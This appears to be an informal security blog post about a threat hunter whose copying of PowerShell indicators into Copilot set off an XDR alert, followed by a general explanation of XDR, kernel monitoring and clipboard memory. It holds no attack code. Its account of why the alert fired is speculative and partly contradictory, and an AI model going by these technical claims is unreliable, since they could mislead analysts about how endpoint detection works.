From Hunter to Hunted: The Clipboard's Hidden Danger

Hi :)

Hello all hunters, todays blog is all about how a copy-past behavior can turn you from a threat hunter to a threat, so grab your cup of coffee, with some Lo-fi piano music and deep dive with me into the art of threat hunters.

📢

All these underling information, are for testing purposes to check the power of XDR and how it behaves, from hunting, to incident solving and more.

Out Here Catching Threats, Not Feelings

Recently, a User was task to collect IOC's related to a certain group from the public Reports, to MITRE ATT&CK and other related threat Intelligence platforms, cute work Right, With lots of dopamine and desire to make this threat hunting and check if any related IOC's are their and detect them in there early stages.

The idea was to collect these IOC's and put them into an file, then filter them depending on the assets that they have, after that he will write KQL for these IOC to run them into the XDR, with lots of KQL tunning and coffee along side the work.

The Moment of Truth: When Everything Unfolds

BUT, WAIT!!! …………… not all work will work as you think darling, one of the IOC's that the User copied have crushed the way he thinks, as if the moment he copied a PowerShell IOC, then put it on Copilot to make a Quick KQL so he can see how his KQL may fit and tune it, also to take ideas and notes, suddenly the browser have crashed and an alert from the windows defenders was generated …………… OMG, what have happened now, didn’t he even run that PowerShell Command to test it’s behavior, he just Copied it.

The Moment of Truth, He went to check the XDR as it detected it and classified it as a sever incident, (sorry but I don’t have a screen shot but, Imagine that), he Went into the attack story (a feature in the XDR) of the incident, as he watched the PowerShell command, created a file inside as certain location as C:\Users\NOOBi\AppData\Local\Temp\[file_name], after that he run a full scan on the device, all was good, and the XDR showed that the redamation stage was successfully DONE, also the File was deleted and all is Good BUT Why and How it that?

XDR: The Protector, Watching Over It All

Doing some research, the idea is that XDR Extended detection and response, is a unified security incident platform that uses AI and automation. It provides an efficient way to protect and respond against advanced cyberattacks, XDR integrates RAM analysis to detect malicious activities by monitoring memory for unusual behaviors like code injection or unauthorized access.

XDR operates at both the application and kernel levels, depending on the specific capabilities of the platform.

Application Level: XDR gathers data from applications and services to identify behavioral anomalies, such as unusual user activity or application exploits. This level focuses on detecting issues like unauthorized access or application-layer attacks.
Kernel Level: For deeper insights, XDR often integrates with kernel-level operations to monitor low-level system activities like process creation, memory manipulation, and privileged operations. This helps detect advanced threats such as rootkits or malicious code injections that operate at the OS core.

RAM analysis typically occurs at the Kernel level because it requires monitoring low-level system operations like memory allocation, execution, and process communication. This is essential for detecting activities such as code injection, buffer overflows, or memory-resident malware.

Clipboard and RAM: A Love Story Written in Memory

Clipboard data is temporarily stored in RAM allowing the system to retain copied or cut content while running. Applications interact with this memory region to access or modify clipboard data. Malware may target this area to monitor or steal sensitive information.

The alert on XDR system was triggered due to suspicious behavior from the PowerShell Copy-Past commands that was represented in short time chucks between each copy. EDR systems focus on monitoring unusual activities, such as malicious commands or scripts, to identify and respond to threats. While they may typically monitor clipboard contents, the EDR detected the suspicious activity within the system. In this case, the alert likely resulted from the PowerShell Copy-Past command's behavior, as EDRs are designed to respond to potential threats in real time. Based on related reports, it's evident that the EDR detected behaviors’ activity as Indicator of Attack (IOA), triggered by the rapid succession of IOCs.

The Moral of the Story: Don't Skip the Plot Twist

What we've learned: Never copy a suspicious PowerShell command into your clipboard without proper precautions like obfuscation, slicing, Defanging or working in an isolated environment, to prevent your self from being detected, also copying huge amount of these suspicious PowerShell IOC’s in small time will generate a suspicious behavior, resulting in an alert.

Written by: Sameer Fakhoury aka.semo